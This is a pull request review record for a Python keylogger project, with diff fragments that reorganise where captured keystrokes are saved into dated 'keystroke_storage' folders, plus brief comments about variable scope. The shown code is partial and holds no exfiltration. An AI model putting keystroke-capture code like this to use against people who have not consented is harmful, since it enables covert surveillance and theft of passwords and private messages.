### PR TITLE
Organize The Files

### PR DESCRIPTION
**Pull request by Ved-programmer**

### CODE REVIEW

File: keylogger.pyw [hunk 1]
```diff
@@ -50,24 +51,39 @@ class Keylogger:
 
             key = specialCases.get(key, self.formatSpecialKey(key))
 
-        # finally, add the key name to our global `self.log` variable
```
Comment (Ved-programmer) [inline keylogger.pyw:53]: the `self.log` variable is not a global variable.

It's defined inside the class and is not available outside the class

File: keylogger.pyw [hunk 2]
```diff
@@ -50,24 +51,39 @@ class Keylogger:
...
+        dayMonth = now.strftime("%m-%d")
+
+        # The path for storing the file
+        curFolder = os.path.join(originalDirectory, "keystroke_storage", monthYear, dayMonth)
+        if not os.path.exists(curFolder):
+            os.makedirs(curFolder)
+        os.chdir(curFolder)
+
         # open the file in write mode (create it)
-        with open(f"Files\\{self.filename}.txt", "w") as f:
```
Comment (Ved-programmer) [inline keylogger.pyw:67]: The files would be stored in the _keystroke_storage_ Folder

File: keylogger.pyw (hunk 1 above)
Comment (crypto-navdeep) [reply keylogger.pyw:53]: I see, during initial stages of developing this, I needed them, now i guess its not neccessary

**Comment by crypto-navdeep** [comment]
Thanks a lot for reaching me out and helping me :)

**Pull request merged**